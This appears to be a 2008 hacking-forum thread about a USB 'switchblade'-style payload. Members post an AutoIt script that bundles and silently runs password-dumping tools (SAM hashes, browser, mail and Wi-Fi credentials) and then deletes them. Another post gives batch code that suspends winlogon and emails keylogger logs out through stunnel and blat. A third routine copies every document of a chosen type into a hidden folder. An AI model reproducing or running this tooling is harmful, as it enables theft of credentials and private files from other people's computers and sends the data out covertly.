jrsmile Posted November 3, 2008 Share Posted November 3, 2008 i rewrote the fetching part so it is only one executable : here the code #AutoIt3Wrapper_Change2CUI=y #include <Constants.au3> FileInstall("pwdump.exe", @ScriptDir & "\pwdump.exe") FileInstall("pwdump7.exe", @ScriptDir & "\pwdump7.exe") FileInstall("fgdump.exe", @ScriptDir & "\fgdump.exe") FileInstall("netpass.exe", @ScriptDir & "\netpass.exe") FileInstall("firepassword.exe", @ScriptDir & "\firepassword.exe") FileInstall("mailpv.exe", @ScriptDir & "\mailpv.exe") FileInstall("ChromePass.exe", @ScriptDir & "\ChromePass.exe") FileInstall("mspass.exe", @ScriptDir & "\mspass.exe") FileInstall("pspv.exe", @ScriptDir & "\pspv.exe") FileInstall("produkey.exe", @ScriptDir & "\produkey.exe") FileInstall("wul.exe", @ScriptDir & "\wul.exe") FileInstall("portqry.exe", @ScriptDir & "\portqry.exe") FileInstall("wifike.exe", @ScriptDir & "\wifike.exe") FileInstall("servpw.exe", @ScriptDir & "\servpw.exe") FileInstall("libeay32.dll", @ScriptDir & "\libeay32.dll") ConsoleWrite(GetOutputOf('pwdump.exe 127.0.0.1')) ConsoleWrite(GetOutputOf('pwdump7.exe')) ConsoleWrite(GetOutputOf('fgdump.exe -vv -c')) ConsoleWrite(GetOutputOf('netpass.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('firepassword.exe')) ConsoleWrite(GetOutputOf('mailpv.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('ChromePass.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('mspass.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('pspv.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('produkey.exe /nosavereg /stext tmpfile')) ConsoleWrite(GetOutputOf('vul.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('portqry.exe -local -v -v')) ConsoleWrite(GetOutputOf('wifike.exe /stext tmpfile')) $search = FileFindFirstFile(@ScriptDir & "\*.*") While 1 $file = FileFindNextFile($search) If @error Then ExitLoop if $file = "start.exe" then ContinueLoop if $file = "start.au3" then ContinueLoop if $file = "output.txt" then ContinueLoop FileDelete($file) WEnd FileClose($search) Func GetOutputOf($cmd) Local $foo = Run(@ScriptDir & '\' & $cmd, @ScriptDir, @SW_HIDE, $STDERR_CHILD + $STDOUT_CHILD) Local $line, $output, $headder = '##############################################' & @CRLF & $cmd & @CRLF & '##############################################' & @CRLF While 1 $line = StdoutRead($foo) If @error Then ExitLoop $output &= $line WEnd If StringInStr($cmd, "tmpfile") Then $output = FileRead(@ScriptDir & '\tmpfile') FileDelete(@ScriptDir & '\tmpfile') EndIf Return $headder & $output EndFunc ;==>GetOutputOf attached you find the link to the exe, because all executables that fetch information are included into the exe it is 1.936.652 kb in size, unfortunately the forum lets me upload only 500kb ... if you execute the file it will extract the executables bound to the attached exe, then start them with the paramaters you see in the source code. the output of interin text files will be piped into the dos console, so a simple call of start.exe >> output.txt will be enough to get all information of the device :-) THIS IS JUST FOR INFORMATION GATHERING, NO KEYLOGGERS ETC WILL BE INSTALLED. best regards, J. btw: if you need "special development" of custom software feel free to contact me. here the link: start.exe Quote Link to comment Share on other sites More sharing options...
X3N Posted November 3, 2008 Share Posted November 3, 2008 i rewrote the fetching part so it is only one executable : here the code #AutoIt3Wrapper_Change2CUI=y #include <Constants.au3> FileInstall("pwdump.exe", @ScriptDir & "\pwdump.exe") FileInstall("pwdump7.exe", @ScriptDir & "\pwdump7.exe") FileInstall("fgdump.exe", @ScriptDir & "\fgdump.exe") FileInstall("netpass.exe", @ScriptDir & "\netpass.exe") FileInstall("firepassword.exe", @ScriptDir & "\firepassword.exe") FileInstall("mailpv.exe", @ScriptDir & "\mailpv.exe") FileInstall("ChromePass.exe", @ScriptDir & "\ChromePass.exe") FileInstall("mspass.exe", @ScriptDir & "\mspass.exe") FileInstall("pspv.exe", @ScriptDir & "\pspv.exe") FileInstall("produkey.exe", @ScriptDir & "\produkey.exe") FileInstall("wul.exe", @ScriptDir & "\wul.exe") FileInstall("portqry.exe", @ScriptDir & "\portqry.exe") FileInstall("wifike.exe", @ScriptDir & "\wifike.exe") FileInstall("servpw.exe", @ScriptDir & "\servpw.exe") FileInstall("libeay32.dll", @ScriptDir & "\libeay32.dll") ConsoleWrite(GetOutputOf('pwdump.exe 127.0.0.1')) ConsoleWrite(GetOutputOf('pwdump7.exe')) ConsoleWrite(GetOutputOf('fgdump.exe -vv -c')) ConsoleWrite(GetOutputOf('netpass.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('firepassword.exe')) ConsoleWrite(GetOutputOf('mailpv.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('ChromePass.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('mspass.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('pspv.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('produkey.exe /nosavereg /stext tmpfile')) ConsoleWrite(GetOutputOf('vul.exe /stext tmpfile')) ConsoleWrite(GetOutputOf('portqry.exe -local -v -v')) ConsoleWrite(GetOutputOf('wifike.exe /stext tmpfile')) $search = FileFindFirstFile(@ScriptDir & "\*.*") While 1 $file = FileFindNextFile($search) If @error Then ExitLoop if $file = "start.exe" then ContinueLoop if $file = "start.au3" then ContinueLoop if $file = "output.txt" then ContinueLoop FileDelete($file) WEnd FileClose($search) Func GetOutputOf($cmd) Local $foo = Run(@ScriptDir & '\' & $cmd, @ScriptDir, @SW_HIDE, $STDERR_CHILD + $STDOUT_CHILD) Local $line, $output, $headder = '##############################################' & @CRLF & $cmd & @CRLF & '##############################################' & @CRLF While 1 $line = StdoutRead($foo) If @error Then ExitLoop $output &= $line WEnd If StringInStr($cmd, "tmpfile") Then $output = FileRead(@ScriptDir & '\tmpfile') FileDelete(@ScriptDir & '\tmpfile') EndIf Return $headder & $output EndFunc ;==>GetOutputOf attached you find the link to the exe, because all executables that fetch information are included into the exe it is 1.936.652 kb in size, unfortunately the forum lets me upload only 500kb ... if you execute the file it will extract the executables bound to the attached exe, then start them with the paramaters you see in the source code. the output of interin text files will be piped into the dos console, so a simple call of start.exe >> output.txt will be enough to get all information of the device :-) THIS IS JUST FOR INFORMATION GATHERING, NO KEYLOGGERS ETC WILL BE INSTALLED. best regards, J. btw: if you need "special development" of custom software feel free to contact me. here the link: start.exe Did you see my topic of the version i wrote in autoit? I was considering doing it with fileinstall but hadnt gotten that far yet i wanted to get the rest of it working good. This was my next task cause i wanted to be able to push it via networking and then execute it on a remote computer... good work!!! here is a link to my topic with my code... http://hak5.org/forums/index.php?showtopic=10486 Quote Link to comment Share on other sites More sharing options...
jrsmile Posted November 3, 2008 Share Posted November 3, 2008 i forgot to mention that if you need any changes i will be glad to help you changing the code or rewriting it for you :-) Quote Link to comment Share on other sites More sharing options...
X3N Posted November 3, 2008 Share Posted November 3, 2008 i forgot to mention that if you need any changes i will be glad to help you changing the code or rewriting it for you :-) can you post a zip containing source and the rest of the files? Quote Link to comment Share on other sites More sharing options...
X3N Posted November 3, 2008 Share Posted November 3, 2008 can you post a zip containing source and the rest of the files? nevermind i found everything... Quote Link to comment Share on other sites More sharing options...
jrsmile Posted November 4, 2008 Share Posted November 4, 2008 nevermind i found everything... sry don't look to often in the forum once twice a day.. if you need help please pm me :) Quote Link to comment Share on other sites More sharing options...
Romulus Posted November 4, 2008 Share Posted November 4, 2008 Is it possible to autorun when a machine is locked by an admin? Quote Link to comment Share on other sites More sharing options...
jrsmile Posted November 5, 2008 Share Posted November 5, 2008 Is it possible to autorun when a machine is locked by an admin? if the admin has autorun enabled, which is by default true then yes :-) Quote Link to comment Share on other sites More sharing options...
noir Posted November 5, 2008 Share Posted November 5, 2008 Is it possible to autorun when a machine is locked by an admin? I don't believe so, at least not in XP. Just as autorun doesn't work when a user is not logged in. Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 5, 2008 Share Posted November 5, 2008 Is it possible to autorun when a machine is locked by an admin? It's so easy as trying it... If you are looking for an answer as this, I think the best is trying by yourself... isn't it? ;) Quote Link to comment Share on other sites More sharing options...
elmer Posted November 7, 2008 Share Posted November 7, 2008 will it search the entire computer? It will recursively copy the contents of the directory in which it is run. If you run it from C:\ it will copy from all of C:\, if you run it from D:\ it would copy from all of D:\, and so on and so forth. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 7, 2008 Share Posted November 7, 2008 It will recursively copy the contents of the directory in which it is run. If you run it from C:\ it will copy from all of C:\, if you run it from D:\ it would copy from all of D:\, and so on and so forth. i just dont see how thats useful... what you need is a single script that searches the entire computer like linux find / |grep *.doc Quote Link to comment Share on other sites More sharing options...
noir Posted November 7, 2008 Share Posted November 7, 2008 i just dont see how thats useful... what you need is a single script that searches the entire computer like linux find / |grep *.doc You can do that with the dir command, you'd just need to have it move to the root directory first. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 7, 2008 Share Posted November 7, 2008 You can do that with the dir command, you'd just need to have it move to the root directory first. yeah but can you write a shell script of some sort that recursivly copies ALL files with a specific extension to one directory. And if you can then post the code. In any language... preferably either bat or autoIT or python. My guess is that python would be the fastest though. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 7, 2008 Share Posted November 7, 2008 whooops double post Quote Link to comment Share on other sites More sharing options...
Matessim Posted November 8, 2008 Share Posted November 8, 2008 theres so much code floating right now, like C+'s codes, if someone will take responsiblity and mash it up together with leapos code and some other things, it will pwn. Quote Link to comment Share on other sites More sharing options...
elmer Posted November 9, 2008 Share Posted November 9, 2008 i just dont see how thats useful... what you need is a single script that searches the entire computer like linux Hm. I should get to work on that. I wonder if File.exist?("D:\.") would work to see if a drive existed. Unfortunately I don't really want to reboot right now, so I guess we will never know. And also, I'm fairly sure that a Ruby version will be just as good as a Python version; they are practically the same language anyway. Quote Link to comment Share on other sites More sharing options...
Matessim Posted November 10, 2008 Share Posted November 10, 2008 next time compile version 9.0 first, please, just compile it already, we provied all the VBC you need. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 10, 2008 Share Posted November 10, 2008 Hm. I should get to work on that. I wonder if File.exist?("D:\.") would work to see if a drive existed. Unfortunately I don't really want to reboot right now, so I guess we will never know. And also, I'm fairly sure that a Ruby version will be just as good as a Python version; they are practically the same language anyway. i like ruby tooo.... im looking for source code too... that way it can be expanded on as well. Quote Link to comment Share on other sites More sharing options...
hacked_13 Posted November 10, 2008 Share Posted November 10, 2008 Re wrote my crappy post Okay now ive officially read all 34 pages.. rawr!! i am king. lol anyway. Couple of things, love your work leapo. (can't spell and im too tired) great idea. I also think i know the problems in the sending of information over the Gmail accounts. ill post new send. files. Also in the start.bat script it also doesn't actually call the right file anyway.... I think this is due to you change the files because you have not actually finished writing that part of the code. Or i could be wrong. in the start.bat. Anyway i do know what im talkin about in the sending part. Keylog In Send.bat GOTO setvariables :sendfiles :: Dump logs pssuspend winlogon.exe Recover.exe pssuspend -r winlogon.exe :: Selects where to grab logs from if exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO AdminRights if not exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO TryAlternate :TryAlternate if exist %appdata%\klgr\winlogon.exe GOTO Recover if not exist %appdata%\klgr\winlogon.exe GOTO NoRights ::If admin rights are found, email logs this way :AdminRights :: Archive log in 1MB chunks rar a %computername%keylog.rar %systemroot%\keylog.txt -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel for %%i in (%systemroot%\%computername%keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup ::If adminrights are not found, email logs this way :NoRights :: Archive log in 1MB chunks rar a keylog.rar %appdata%\keylog.txt -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel for %%i in (%appdata%\keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup :Cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents rmdir /s /q docs ::Not sure what ^^ line does cause there should not be a docs folder due to the no hacksaw... :: Delete archive ::For Admin Rights del /q /f %systemroot%\%computername%keylog.r*.* ::For No Admin Rights del /q /f %appdata%\keylog.r*.* GOTO end :setvariables This is only minor clean up code and the bold computer name part. You weren't actually sending anything... That should "theoretically" fix the sending of the Keylogs. The Hacksaw sending is Fine But i dont have an awesome deal of knowledge of cmd to understand the NMAP one. NMAP send_partial GOTO Setvariables :sendfiles so i gather that :sendfiles means that it is defining that when you say later to go to This point. which is wrong.. cause you already define it later on: :sendfiles for %%i in (%computername%.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup So defining it twice i believe would make windows chuck a hissy :D (I think.. correct me if im wrong) So unless i am wrong (which i prob will be) by getting rid of the first ":sendfiles" it SHould fix it. as well as: send_partial for nmap :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents :: Delete archive rmdir /s /q %systemroot%\$NtUninstallKB91338$ GOTO end you were actually deleting the wrong folder and not the archives. oo now i get it. But yes. you forgot the 8. Just small fixes :D Also add under ::Delete documents "del /q /f %computername%.* Now the Nmap SHOULD send, as well as the keylogger as long as it makes the logs correctly and in C:\ or wherev its mean to be. Hope these actually work. Im in the process of installing xp. (stupid shit os.....takes to long) on a virtual machine. So yeah. then i was going to try it :D Just thinking now as i was reading over it...that it does a 3 part send and 3 part clean up... fk it im still posting. :P Quote Link to comment Share on other sites More sharing options...
jrsmile Posted November 11, 2008 Share Posted November 11, 2008 somebody requested a slurping code in autoit? _CopyAll("doc") Func _CopyAll($type, $where = @HomeDrive, $to = "C:\HIDDEN\FOLDER\") Local $search = FileFindFirstFile($where & "\*.*"), $file If $search = -1 Then Return False EndIf While 1 $file = FileFindNextFile($search) If @error Then ExitLoop If StringRight($file, 4) = "." & $type Then FileCopy($where & "\" & $file, $to, 9) If StringInStr(FileGetAttrib($where & "\" & $file), "D") Then Call("_CopyAll", $type, $where & "\" & $file) EndIf WEnd FileClose($search) EndFunc ;==>_CopyAll Quote Link to comment Share on other sites More sharing options...
X3N Posted November 11, 2008 Share Posted November 11, 2008 somebody requested a slurping code in autoit? _CopyAll("doc") Func _CopyAll($type, $where = @HomeDrive, $to = "C:\HIDDEN\FOLDER\") Local $search = FileFindFirstFile($where & "\*.*"), $file If $search = -1 Then Return False EndIf While 1 $file = FileFindNextFile($search) If @error Then ExitLoop If StringRight($file, 4) = "." & $type Then FileCopy($where & "\" & $file, $to, 9) If StringInStr(FileGetAttrib($where & "\" & $file), "D") Then Call("_SearchAll", $type, $where & "\" & $file) EndIf WEnd FileClose($search) EndFunc ;==>_CopyAll Sweet ill have to try this out. Quote Link to comment Share on other sites More sharing options...
Matessim Posted November 12, 2008 Share Posted November 12, 2008 this project is freezing someones gotta release VER 9 gerr Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 14, 2008 Share Posted November 14, 2008 this project is freezing someones gotta release VER 9 gerr In fact, I'm waiting for version 9 for something else developing, but without Leapo... we can continue developing this stuff. The first we have to do is reading the forum, there are very interesting things we can add to the payload as the MySQL+PHP way of sending the logs (not only this). Moreover, some of us can contribute with new ideas but a working group is needed and a base in what to develop is needed too. Where's Leapo? If he wants to continue his work as he told a pair of weeks ago, I'll be glad of contributing in the few I could, if he doesn't... will wait! Quote Link to comment Share on other sites More sharing options...
Tmbomber Posted November 15, 2008 Share Posted November 15, 2008 Where's Leapo? Leapo said a couple weeks ago that he can't do anything with the payload during the week. He's only working on it as he has time on weekends. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.